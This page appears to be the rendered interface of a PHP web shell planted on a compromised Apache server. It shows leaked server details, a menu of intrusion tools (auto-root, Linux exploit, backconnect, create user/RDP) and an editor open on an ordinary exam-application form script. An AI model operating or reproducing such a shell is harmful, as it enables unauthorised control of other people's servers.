Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.146.176.1
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
misc /
public_html /
nium /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
mask
[ DIR ]
drwxr-xr-x
editapp.js
22.28
KB
-rwxr-xr-x
form_submit.js
1.36
KB
-rwxr-xr-x
formatdate.js
12.48
KB
-rwxr-xr-x
home.js
5.09
KB
-rwxr-xr-x
home11082016.js
5.11
KB
-rwxr-xr-x
index.js
31.01
KB
-rwxr-xr-x
index2.js
25.45
KB
-rwxr-xr-x
index_27082015.js
28
KB
-rwxr-xr-x
index_before_hallticket.js
27.56
KB
-rwxr-xr-x
jquery-1.4.2.min.js
70.48
KB
-rwxr-xr-x
jquery-ui-1.7.2.custom.min.js
188.23
KB
-rwxr-xr-x
jquery.cycle.all.min.js
31.29
KB
-rwxr-xr-x
jquery.cycle.js
42.99
KB
-rwxr-xr-x
jscript.js
25.71
KB
-rwxr-xr-x
jscript_old.js
25.4
KB
-rwxr-xr-x
login.js
2.76
KB
-rwxr-xr-x
spinner.js
13.84
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : editapp.js
var applicationEdit_no; function editApplicationDetails() { if(document.getElementById('feditapp_num').value =='' ) { alert('Enter Application Number '); document.getElementById('feditapp_num').focus(); return; } editApplnno = document.getElementById('feditapp_num').value; var $parameters = "editapplication_no="+editApplnno; $.ajax({ type: "POST", url: $host_url+"editApplDetails.demo", data:$parameters, success: editApplDetailsDetailsResponse }); } function loadSelectFeilds() { loadCategoryList(); loadDomicileStateList(); } function editApplDetailsDetailsResponse($responce) { $responce = eval('(' + $responce + ')'); if ($responce.error_code == 0) { applicationEdit_no = $responce.data['fappno']; $('#editapp_no').html($responce.data['fappno']); $('#fname').val($responce.data['fname']); $('#fnationality').val($responce.data['fnational']); $('#ffather').val($responce.data['ffatname']); $('#fmother').val($responce.data['fmotname']); $('#per_addr_corsp1').val($responce.data['faddr1']); $('#per_addr_corsp2').val($responce.data['faddr2']); $('#per_addr_corsp3').val($responce.data['faddr3']); $('#per_addr_corsp4').val($responce.data['faddr4']); $('#per_addrs1').val($responce.data['faddp1']); $('#per_addrs2').val($responce.data['faddp2']); $('#per_addrs3').val($responce.data['faddp3']); $('#per_addrs4').val($responce.data['faddp4']); $('#fmobile').val($responce.data['fphone']); $('#fphoneno').val($responce.data['fmobile']); $('#femailid').val($responce.data['femail']); $('#fcollegecode').val($responce.data['fcollege']); $('#funiversity').val($responce.data['funiversity']); $('#fpercentage').val($responce.data['fpercent']); $('#fmax_marks1').val($responce.data['fmaxmarks1']); $('#fmax_marks2').val($responce.data['fmaxmarks2']); $('#fmax_marks3').val($responce.data['fmaxmarks3']); $('#fmax_marks4').val($responce.data['fmaxmarks4']); $('#fmax_marks5').val($responce.data['fmaxmarks5']); $('#fsecured_marks1').val($responce.data['fsecmarks1']); $('#fsecured_marks2').val($responce.data['fsecmarks2']); $('#fsecured_marks3').val($responce.data['fsecmarks3']); $('#fsecured_marks4').val($responce.data['fsecmarks4']); $('#fsecured_marks5').val($responce.data['fsecmarks5']); $('#fno_of_attempts1').val($responce.data['fnoatt1']); $('#fno_of_attempts2').val($responce.data['fnoatt2']); $('#fno_of_attempts3').val($responce.data['fnoatt3']); $('#fno_of_attempts4').val($responce.data['fnoatt4']); $('#fno_of_attempts5').val($responce.data['fnoatt5']); $('#fpassed_month1').val($responce.data['fpassmth1']); $('#fpassed_month2').val($responce.data['fpassmth2']); $('#fpassed_month3').val($responce.data['fpassmth3']); $('#fpassed_month4').val($responce.data['fpassmth4']); $('#fpassed_month5').val($responce.data['fpassmth5']); $('#fchallan_no').val($responce.data['fchallanno']); $('#fchall_amount').val($responce.data['fchallanamount']); $('#fname_of_bank').val($responce.data['fbank']); $('#fbranch_name_place').val($responce.data['fbranch']); var gender_val=$responce.data['fgender']; var phdisable_val=$responce.data['fph']; var goinomini_val = $responce.data['fgoi']; var govtin_val=$responce.data['fgis']; var dob_str = $responce.data['fdob']; var dobArray = new Array(); dobArray = dob_str.split("/"); $("#fdob_date").val(dobArray[0]); $("#fdob_month").val(dobArray[1]); $("#fdob_year").val(dobArray[2]); var doi_str = $responce.data['fdoi']; var doiArray = new Array(); doiArray = doi_str.split("/"); $("#fdate_of_compl_intership").val(doiArray[0]); $("#fmonth_of_compl_intership").val(doiArray[1]); $("#fyear_of_compl_intership").val(doiArray[2]); var challdate_str = $responce.data['fchallandate']; var challanArray = new Array(); challanArray = challdate_str.split("/"); $("#fchall_date").val(challanArray[0]); $("#fchall_month").val(challanArray[1]); $("#fchall_year").val(challanArray[2]); $('input:radio[name="fgender"]').filter("[value='"+gender_val+"']").attr('checked', true); $('input:radio[name="fphysically_disable"]').filter("[value='"+phdisable_val+"']").attr('checked', true); $('input:radio[name="fgoi_nominee"]').filter("[value='"+goinomini_val+"']").attr('checked', true); $('input:radio[name="fwhether_govt_service_candidate"]').filter("[value='"+govtin_val+"']").attr('checked', true); var stdpic_path=$responce.data['photo_path']; $.ajax({ url:stdpic_path, //or your url success: function(data){ image = document.getElementById('student_entry_photo'); image.src =stdpic_path; }, error: function(data){ var photo_path="img/default_photo.jpg"; image = document.getElementById('student_entry_photo'); image.src =photo_path; }, }) $('#fdomicile_state').val($responce.data['fdomicile']); $('#fcategory').val($responce.data['fcatcode']); $("#edit_app_main").show(); } else { alert($responce.data); document.forms['form_module_image_upload'].reset(); applicationEdit_no = 0; $("#application_entry_field").show(); $("#edit_app_main").hide(); } } function saveFormUpdateDetails() { var lmax1=document.getElementById('fmax_marks1').value; var lsec1=document.getElementById('fsecured_marks1').value; lmax1=parseFloat(lmax1); lsec1=parseFloat(lsec1); var lmax2=document.getElementById('fmax_marks2').value; var lsec2=document.getElementById('fsecured_marks2').value; lmax2=parseFloat(lmax2); lsec2=parseFloat(lsec2); var lmax3=document.getElementById('fmax_marks3').value; var lsec3=document.getElementById('fsecured_marks3').value; lmax3=parseFloat(lmax3); lsec3=parseFloat(lsec3); var lmax4=document.getElementById('fmax_marks4').value; var lsec4=document.getElementById('fsecured_marks4').value; var lmax5=document.getElementById('fmax_marks5').value; var lsec5=document.getElementById('fsecured_marks5').value; if(trim(document.getElementById('fname').value) == '' ) { alert('Please enter the Name'); document.getElementById('fname').focus(); return; } if(($("#fdob_date").val() == '' || $("#fdob_date").val() > 31) || ($("#fdob_month").val() == '' || $("#fdob_month").val() > 12) || ($("#fdob_year").val() == '' || $("#fdob_year").val() >2014) ) { alert('Please Enter the Valid Date of Birth..!'); document.getElementById('fdob_date').focus(); return; } if(document.getElementById('fmale').checked == false && document.getElementById('female').checked == false ) { alert('Please Select Gender'); document.getElementById('fname').focus(); return; } if(trim(document.getElementById('fcategory').value) == '' ) { alert('Please Select the Category'); document.getElementById('fcategory').focus(); return; } if(trim(document.getElementById('fnationality').value) == '' ) { alert('Please Enter the Nationality'); document.getElementById('fnationality').focus(); return; } if(trim(document.getElementById('fdomicile_state').value) == '' ) { alert('Please Select the Domicile state'); document.getElementById('fdomicile_state').focus(); return; } if(trim(document.getElementById('fmother').value) == '' ) { alert('Please enter the Mother\'s Name'); document.getElementById('fmother').focus(); return; } if(trim(document.getElementById('ffather').value) == '' ) { alert('Please enter the Father\' Name'); document.getElementById('ffather').focus(); return; } if(trim(document.getElementById('per_addr_corsp1').value) == '' ) { alert('Please enter the Permanent Address Correspondence'); document.getElementById('per_addr_corsp1').focus(); return; } if(trim(document.getElementById('per_addrs1').value) == '') { alert('Please enter the Permanent Address '); document.getElementById('per_addrs1').focus(); return; } if(trim(document.getElementById('fmobile').value) == '' || parseFloat(document.getElementById('fmobile').value) < 10) { alert('Please enter the Mobile No'); document.getElementById('fmobile').focus(); return; } if(trim(document.getElementById('fphoneno').value) == '' ) { alert('Please enter the Phone No'); document.getElementById('fphoneno').focus(); return; } if(trim(document.getElementById('femailid').value) == '' ) { alert('Please enter the Email Id'); document.getElementById('femailid').focus(); return; } if(trim(document.getElementById('fcollegecode').value) == '' ) { alert('Please enter the College Code'); document.getElementById('fcollegecode').focus(); return; } if(trim(document.getElementById('funiversity').value) == '' ) { alert('Please enter the University'); document.getElementById('funiversity').focus(); return; } if($("#fdate_of_compl_intership").val() == '' || parseFloat($("#fdate_of_compl_intership").val()) > 31 || $("#fmonth_of_compl_intership").val() == '' || parseFloat($("#fmonth_of_compl_intership").val()) > 12 || $("#fyear_of_compl_intership").val() == '') { alert('Please Enter the Valid Completion of Internship Date..!'); document.getElementById('fdate_of_compl_intership').focus(); return; } if(document.getElementById('fpercentage').value == '' ) { alert('Please enter the Percentage'); document.getElementById('fpercentage').focus(); return; } if(document.getElementById('fpercentage').value >100 ) { alert('Percentage Should not be greater than 100'); document.getElementById('fpercentage').focus(); return; } if(document.getElementById('fmax_marks1').value == '' || document.getElementById('fsecured_marks1').value == '' || document.getElementById('fno_of_attempts1').value == '' || document.getElementById('fpassed_month1').value == '') { alert('Please enter the Examination I Details'); document.getElementById('fmax_marks1').focus(); return; } if(lsec1 > lmax1) { alert('Secured Marks in 1st Year Cannot be greater than Maximum Marks'); document.getElementById('fsecured_marks1').focus(); return; } if(document.getElementById('fno_of_attempts1').value <= 0) { alert('Number of Attempts should be Greater than or Equal to 1'); document.getElementById('fno_of_attempts1').focus(); return; } if(document.getElementById('fmax_marks2').value == '' || document.getElementById('fsecured_marks2').value == '' || document.getElementById('fno_of_attempts2').value == '' || document.getElementById('fpassed_month2').value == '') { alert('Please enter the Examination II Details'); document.getElementById('fmax_marks2').focus(); return; } if(lsec2 > lmax2) { alert('Secured Marks in 2nd Year Cannot be greater than Maximum Marks'); document.getElementById('fsecured_marks2').focus(); return; } if(document.getElementById('fno_of_attempts2').value <= 0) { alert('Number of Attempts should be Greater than or Equal to 1'); document.getElementById('fno_of_attempts2').focus(); return; } if(document.getElementById('fmax_marks3').value == '' || document.getElementById('fsecured_marks3').value == '' || document.getElementById('fno_of_attempts3').value == '' || document.getElementById('fpassed_month3').value == '') { alert('Please enter the Examination III Details'); document.getElementById('fmax_marks3').focus(); return; } if(lsec3 > lmax3) { alert('Secured Marks in 3rd Year Cannot be greater than Maximum Marks'); document.getElementById('fsecured_marks3').focus(); return; } if(document.getElementById('fno_of_attempts3').value <= 0) { alert('Number of Attempts should be Greater than or Equal to 1'); document.getElementById('fno_of_attempts3').focus(); return; } if(lmax4 != '') { if(document.getElementById('fsecured_marks4').value =='' || document.getElementById('fno_of_attempts4').value =='' || document.getElementById('fpassed_month4').value =='' ) { alert('Please enter the Examination IV Details'); document.getElementById('fmax_marks4').focus(); return; } lmax4=parseFloat(lmax4); lsec4=parseFloat(lsec4); if(lsec4 > lmax4) { alert('Secured Marks in 4th Year Cannot be greater than Maximum Marks'); document.getElementById('fsecured_marks4').focus(); return; } if(document.getElementById('fno_of_attempts4').value <= 0) { alert('Number of Attempts should be Greater than or Equal to 1'); document.getElementById('fno_of_attempts4').focus(); return; } } if(lmax5 != '') { if(document.getElementById('fsecured_marks5').value =='' || document.getElementById('fno_of_attempts5').value =='' || document.getElementById('fpassed_month5').value =='') { alert('Please enter the Examination V Details'); document.getElementById('fmax_marks5').focus(); return; } lmax5=parseFloat(lmax5); lsec5=parseFloat(lsec5); if(lsec5 > lmax5) { alert('Secured Marks in 5th Year Cannot be greater than Maximum Marks'); document.getElementById('fsecured_marks5').focus(); return; } if(document.getElementById('fno_of_attempts5').value <= 0) { alert('Number of Attempts should be Greater than or Equal to 1'); document.getElementById('fno_of_attempts5').focus(); return; } } if(document.getElementById('fchallan_no').value == '') { alert('Please enter the Challan No'); document.getElementById('fchallan_no').focus(); return; } if(($("#fchall_date").val() == '' || $("#fchall_date").val() > 31) || ($("#fchall_month").val() == '' || $("#fchall_month").val() > 12) || $("#fchall_year").val() == '' || $("#fchall_year").val() > 2014) { alert('Please Enter the Valid Challan Date..!'); document.getElementById('fchall_date').focus(); return; } if(document.getElementById('fchall_amount').value == '') { alert('Challen Amount Cannot Be Blank'); document.getElementById('fchall_amount').focus(); return; } if(document.getElementById('fname_of_bank').value == '') { alert('Please enter the Bank Name'); document.getElementById('fname_of_bank').focus(); return; } if(document.getElementById('fbranch_name_place').value == '') { alert('Please enter the Branch'); document.getElementById('fbranch_name_place').focus(); return; } disableUpadteFormFields(); } function disableUpadteFormFields() { $("#application_entry_field").hide(); $("#edit_link").show(); $("#save_link").show(); $("#preview_link").hide(); $("#error_notify_msg").show(); var inputBoxes = document.getElementsByTagName('input'); for (var counter=0; counter < inputBoxes.length; counter++) { inputBoxes[counter].disabled=true; } } function enableUpdateApplicationFields() { var inputBoxes = document.getElementsByTagName('input'); for (var counter=0; counter < inputBoxes.length; counter++) { inputBoxes[counter].disabled=false; } document.getElementById('fexam1').disabled=true; document.getElementById('fexam2').disabled=true; document.getElementById('fexam3').disabled=true; document.getElementById('fexam4').disabled=true; document.getElementById('fexam5').disabled=true; document.getElementById("fname").focus(); $("#edit_link").hide(); $("#save_link").hide(); $("#preview_link").show(); $("#error_notify_msg").hide(); } function saveUpdateApplicationDetails() { if (confirm(" Are you sure you want to Save, Then Press 'OK' Else 'Cancel' ") == true) { $lstr_data="fname="+encodeURIComponent($("#fname").val()); $lstr_data+="&fcategory="+encodeURIComponent($("#fcategory").val()); $lstr_data+="&ffather="+encodeURIComponent($("#ffather").val()); $lstr_data+="&fmother="+encodeURIComponent($("#fmother").val()); $lstr_data+="&fnationality="+encodeURIComponent($("#fnationality").val()); var fgender_check = ""; for (i = 0; i < document.getElementsByName('fgender').length; i++) { if (document.getElementsByName('fgender')[i].checked) { fgender_check = document.getElementsByName('fgender')[i].value; } } $lstr_data+="&fgender="+encodeURIComponent(fgender_check); var fphysically_disable = ""; for (i = 0; i < document.getElementsByName('fphysically_disable').length; i++) { if (document.getElementsByName('fphysically_disable')[i].checked) { fphysically_disable = document.getElementsByName('fphysically_disable')[i].value; } } $lstr_data+="&fph_disabled="+encodeURIComponent(fphysically_disable); var fgoi_nominee_chk = ""; for (i = 0; i < document.getElementsByName('fgoi_nominee').length; i++) { if (document.getElementsByName('fgoi_nominee')[i].checked) { fgoi_nominee_chk = document.getElementsByName('fgoi_nominee')[i].value; } } $lstr_data+="&fgoi_nominee="+encodeURIComponent(fgoi_nominee_chk); var fwhether_govt_service_candt_chk = ""; for (i = 0; i < document.getElementsByName('fwhether_govt_service_candidate').length; i++) { if (document.getElementsByName('fwhether_govt_service_candidate')[i].checked) { fwhether_govt_service_candt_chk = document.getElementsByName('fwhether_govt_service_candidate')[i].value; } } $lstr_data+="&fwhether_govt_service_candidate="+encodeURIComponent(fwhether_govt_service_candt_chk); $lstr_data+="&date_of_birth="+encodeURIComponent($("#fdob_year").val()+"-"+$("#fdob_month").val()+"-"+$("#fdob_date").val()); $lstr_data+="&complt_internship_date="+encodeURIComponent($("#fyear_of_compl_intership").val()+"-"+$("#fmonth_of_compl_intership").val()+"-"+$("#fdate_of_compl_intership").val()); $lstr_data+="&fdomicile_state="+encodeURIComponent($("#fdomicile_state").val()); $lstr_data+="&fpermanent_address_Corresp="+encodeURIComponent($("#fpermanent_address_Corresp").val()); $lstr_data+="&fpermanent_address="+encodeURIComponent($("#fpermanent_address").val()); $lstr_data+="&fmobile="+encodeURIComponent($("#fmobile").val()); $lstr_data+="&fphoneno="+encodeURIComponent($("#fphoneno").val()); $lstr_data+="&femailid="+encodeURIComponent($("#femailid").val()); $lstr_data+="&fcollegecode="+encodeURIComponent($("#fcollegecode").val()); $lstr_data+="&funiversity="+encodeURIComponent($("#funiversity").val()); $lstr_data+="&fpercentage="+encodeURIComponent($("#fpercentage").val()); $lstr_data+="&per_addr_corsp1="+encodeURIComponent($("#per_addr_corsp1").val()); $lstr_data+="&per_addr_corsp2="+encodeURIComponent($("#per_addr_corsp2").val()); $lstr_data+="&per_addr_corsp3="+encodeURIComponent($("#per_addr_corsp3").val()); $lstr_data+="&per_addr_corsp4="+encodeURIComponent($("#per_addr_corsp4").val()); $lstr_data+="&per_addrs1="+encodeURIComponent($("#per_addrs1").val()); $lstr_data+="&per_addrs2="+encodeURIComponent($("#per_addrs2").val()); $lstr_data+="&per_addrs3="+encodeURIComponent($("#per_addrs3").val()); $lstr_data+="&per_addrs4="+encodeURIComponent($("#per_addrs4").val()); $lstr_data+="&fchallan_date="+encodeURIComponent($("#fchall_year").val()+"-"+$("#fchall_month").val()+"-"+$("#fchall_date").val()); $lstr_data+="&fchallan_no="+encodeURIComponent($("#fchallan_no").val()); $lstr_data+="&fchall_amount="+encodeURIComponent($("#fchall_amount").val()); $lstr_data+="&fname_of_bank="+encodeURIComponent($("#fname_of_bank").val()); $lstr_data+="&fbranch_name_place="+encodeURIComponent($("#fbranch_name_place").val()); $lstr_data+="&fexam1="+encodeURIComponent($("#fexam1").val()); $lstr_data+="&fmax_marks1="+encodeURIComponent($("#fmax_marks1").val()); $lstr_data+="&fsecured_marks1="+encodeURIComponent($("#fsecured_marks1").val()); $lstr_data+="&fno_of_attempts1="+encodeURIComponent($("#fno_of_attempts1").val()); $lstr_data+="&fpassed_month1="+encodeURIComponent($("#fpassed_month1").val()); $lstr_data+="&fexam2="+encodeURIComponent($("#fexam2").val()); $lstr_data+="&fmax_marks2="+encodeURIComponent($("#fmax_marks2").val()); $lstr_data+="&fsecured_marks2="+encodeURIComponent($("#fsecured_marks2").val()); $lstr_data+="&fno_of_attempts2="+encodeURIComponent($("#fno_of_attempts2").val()); $lstr_data+="&fpassed_month2="+encodeURIComponent($("#fpassed_month2").val()); $lstr_data+="&fexam3="+encodeURIComponent($("#fexam3").val()); $lstr_data+="&fmax_marks3="+encodeURIComponent($("#fmax_marks3").val()); $lstr_data+="&fsecured_marks3="+encodeURIComponent($("#fsecured_marks3").val()); $lstr_data+="&fno_of_attempts3="+encodeURIComponent($("#fno_of_attempts3").val()); $lstr_data+="&fpassed_month3="+encodeURIComponent($("#fpassed_month3").val()); $lstr_data+="&fexam4="+encodeURIComponent($("#fexam4").val()); $lstr_data+="&fmax_marks4="+encodeURIComponent($("#fmax_marks4").val()); $lstr_data+="&fsecured_marks4="+encodeURIComponent($("#fsecured_marks4").val()); $lstr_data+="&fno_of_attempts4="+encodeURIComponent($("#fno_of_attempts4").val()); $lstr_data+="&fpassed_month4="+encodeURIComponent($("#fpassed_month4").val()); $lstr_data+="&fexam5="+encodeURIComponent($("#fexam5").val()); $lstr_data+="&fmax_marks5="+encodeURIComponent($("#fmax_marks5").val()); $lstr_data+="&fsecured_marks5="+encodeURIComponent($("#fsecured_marks5").val()); $lstr_data+="&fno_of_attempts5="+encodeURIComponent($("#fno_of_attempts5").val()); $lstr_data+="&fpassed_month5="+encodeURIComponent($("#fpassed_month5").val()); $lstr_data+="&applicationEdit_no="+applicationEdit_no; $.ajax({ type: "POST", //async:false, url: $host_url+"updateFormEntry.demo", data:$lstr_data, success:updateFormEntryResponse }); } } function updateFormEntryResponse($responce) { $responce = eval('(' + $responce + ')'); if ($responce.error_code == 0) { alert("Application Number :"+" "+$responce.data+" "+"Updated Successfully"); generateApplicationPdf($responce.data); enableApplicationFields(); document.forms['form_module_image_upload'].reset(); $("#application_entry_field").show(); $("#edit_app_main").hide(); applicationEdit_no = 0; $("#feditapp_num").val(''); } else { alert($responce.data); } }
Close